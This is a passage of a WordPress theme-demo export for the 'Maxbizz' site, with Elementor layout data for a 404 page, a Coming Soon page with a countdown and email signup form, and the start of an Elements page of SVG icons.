		<wp:meta_value><![CDATA[a:10:{s:6:"column";a:3:{s:5:"count";i:19;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:19;s:19:"_inline_size_tablet";i:12;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:2:{s:14:"subtitle_style";i:2;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:5:"style";a:1:{s:13:"section_style";a:2:{s:5:"align";i:2;s:10:"text_color";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_mobile";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:9;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:6;}s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:5;s:16:"content_position";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:7:"padding";i:6;s:14:"padding_mobile";i:2;s:11:"css_classes";i:2;}}s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:2;s:16:"background_image";i:2;s:19:"background_position";i:2;s:17:"background_repeat";i:2;s:15:"background_size";i:1;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:1:{s:5:"title";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:4:{s:5:"align";i:1;s:12:"align_mobile";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iswitcher";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"title_left";i:1;s:11:"title_right";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:2:{s:11:"title_color";i:1;s:9:"toggle_bg";i:1;}}}}s:13:"ipricingtable";a:3:{s:5:"count";i:6;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"title";i:6;s:5:"price";i:6;s:9:"price_for";i:6;s:7:"details";i:6;s:11:"is_featured";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:4;}}}}s:7:"iclogos";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:14:"image_carousel";i:1;s:5:"tshow";i:1;s:12:"tshow_tablet";i:1;s:4:"dots";i:1;}}s:5:"style";a:1:{s:19:"image_style_section";a:3:{s:11:"img_spacing";i:1;s:32:"img_css_filters_hover_css_filter";i:1;s:32:"img_css_filters_hover_brightness";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>404</title>
		<link>http://wpdemo.archiwp.com/maxbizz/404-2/</link>
		<pubDate>Wed, 09 Sep 2020 03:33:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=597</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_White.svg" alt="Maxbizz">
				</a>			        
			<h1>404</h1>		
			<h2>Sorry! Page Not Found!</h2>		
		<p>Oops! The page you are looking for does not exist. Please return to the site’s homepage.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/">TAKE ME HOME</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>597</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:33:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:33:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[404-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"dc90a5e","elType":"section","settings":{"height":"full","content_position":"middle","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg-404.jpg","id":599},"css_classes":"error-404","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"ab481db","elType":"column","settings":{"_column_size":100,"_inline_size":null,"align":"center","_ot_content_align":""},"elements":[{"id":"ff9a571","elType":"widget","settings":{"align":"center","logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_White.svg","id":404},"logo_width":{"unit":"px","size":140,"sizes":[]},"_position":"fixed","_offset_x":{"size":0,"unit":"px"},"_offset_y":{"size":70,"unit":"px"},"_offset_y_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"2a1d1ef","elType":"widget","settings":{"title":"404","header_size":"h1","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":180,"sizes":[]},"typography_font_weight":"300","_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":80,"sizes":[]},"typography_font_family":"Open Sans","typography_line_height":{"unit":"px","size":"","sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"6bd4e37","elType":"widget","settings":{"title":"Sorry! Page Not Found!","align":"center","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":42,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":34,"sizes":[]},"typography_line_height_mobile":{"unit":"em","size":1.1999999999999999555910790149937383830547332763671875,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"02eb208","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"b70cb7b","elType":"column","settings":{"_column_size":33,"_inline_size":30,"_inline_size_tablet":20},"elements":[],"isInner":true},{"id":"2ca71f3","elType":"column","settings":{"_column_size":33,"_inline_size":38.88900000000000289901436190120875835418701171875,"_inline_size_tablet":60},"elements":[{"id":"c0b5c0b","elType":"widget","settings":{"editor":"<p>Oops! The page you are looking for does not exist. Please return to the site\u2019s homepage.<\/p>","align":"center","text_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"column_gap":{"unit":"%","size":"","sizes":[]},"_element_custom_width":{"unit":"px","size":425,"sizes":[]},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1958c9e","elType":"column","settings":{"_column_size":33,"_inline_size":30.77499999999999857891452847979962825775146484375,"_inline_size_tablet":20},"elements":[],"isInner":true}],"isInner":true},{"id":"c047923","elType":"widget","settings":{"_css_classes":"page-content","_margin":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-search"},{"id":"64444b7","elType":"widget","settings":{"align":"center","text":"TAKE ME HOME","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","background_color":"","border_color":""},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"align";i:1;s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:4:{s:9:"_position";i:1;s:9:"_offset_x";i:1;s:9:"_offset_y";i:1;s:16:"_offset_y_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:3:{s:5:"title";i:2;s:11:"header_size";i:1;s:5:"align";i:2;}}s:5:"style";a:1:{s:19:"section_title_style";a:8:{s:11:"title_color";i:2;s:21:"typography_typography";i:2;s:20:"typography_font_size";i:2;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_family";i:1;s:22:"typography_line_height";i:1;s:29:"typography_line_height_mobile";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:3;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:1;s:10:"column_gap";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:5:"align";i:1;s:10:"text_color";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;}}s:8:"advanced";a:1:{s:17:"_section_position";a:1:{s:21:"_element_custom_width";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:4:{s:6:"layout";i:1;s:3:"gap";i:1;s:6:"height";i:1;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:11:"css_classes";i:1;}}s:5:"style";a:1:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_image";i:1;}}}}s:16:"wp-widget-search";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:1;s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:5:"align";i:1;s:4:"text";i:1;s:4:"link";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Coming Soon</title>
		<link>http://wpdemo.archiwp.com/maxbizz/coming-soon/</link>
		<pubDate>Wed, 09 Sep 2020 03:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=604</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/theratio">
							<img src="https://maxbizz.s3.amazonaws.com/images/01_Black.svg" alt="" loading="lazy" />								</a>
			<h2>Maxbizz is in the Works!</h2>		
		<ul data-zone="0" data-date="2021/09/01 12:00" data-day="Day" data-days="Days" data-hour="Hour" data-hours="Hours" data-min="Minute" data-mins="Minutes" data-second="Second" data-seconds="Seconds">
			<li>00<p>Days</p></li>
			<li>:</li>
			<li>00<p>Hours</p></li>
			<li>:</li>
			<li>00<p>Minutes</p></li>
			<li>:</li>
			<li>00<p>Seconds</p></li>
		</ul>
		<p>We are about to go live so watch this space!</p>		
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz/wp-admin/admin-ajax.php#wpcf7-f610-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="610" />
<input type="hidden" name="_wpcf7_version" value="5.3.1" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f610-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><button>Sign Up</button>
</form>		
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>604</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 03:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 03:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[coming-soon]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"f1dbf06","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/coming-soon.jpg","id":607},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","height":"full","content_position":"middle","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"65f2915","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"adfe967","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_Black.svg","id":334},"image_size":"full","image_custom_dimension":{"width":"80","height":"80"},"width":{"unit":"px","size":140,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"link_to":"custom","link":{"url":"http:\/\/wpdemo.archiwp.com\/theratio","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"image"},{"id":"32c523f","elType":"widget","settings":{"title":"Maxbizz is in the Works!","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":48,"sizes":[]},"typography_line_height":{"unit":"px","size":110,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":42,"sizes":[]},"typography_line_height_mobile":{"unit":"px","size":55,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"title_color":"#1A1A1A","typography_font_family":"Inter","typography_font_weight":"700"},"elements":[],"widgetType":"heading"},{"id":"df3cd75","elType":"widget","settings":{"day":"Day","hour":"Hour","min":"Minute","second":"Second","days":"Days","hours":"Hours","mins":"Minutes","seconds":"Seconds","_padding":{"unit":"px","top":"0","right":"0","bottom":"90","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"date":"2021-09-01 12:00"},"elements":[],"widgetType":"icountdown"},{"id":"2c42310","elType":"widget","settings":{"editor":"<p>We are about to go live so watch this space!<\/p>","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]},"text_color":"#555555","typography_font_family":"Inter"},"elements":[],"widgetType":"text-editor"},{"id":"5507345","elType":"widget","settings":{"cf7":"610","_padding":{"unit":"px","top":"0","right":"0","bottom":"115","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"},{"id":"880944e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:22:"image_custom_dimension";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:8:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_line_height";i:1;s:27:"typography_font_size_mobile";i:1;s:29:"typography_line_height_mobile";i:1;s:11:"title_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:10:"icountdown";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:4:"date";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:6:{s:5:"align";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;s:10:"text_color";i:1;s:22:"typography_font_family";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:2:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:1;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;}}s:6:"layout";a:1:{s:14:"section_layout";a:2:{s:6:"height";i:1;s:16:"content_position";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz/elements/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=624</guid>
		<description></description>
		<content:encoded><![CDATA[<h4>Icon Boxes</h4>		
						<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 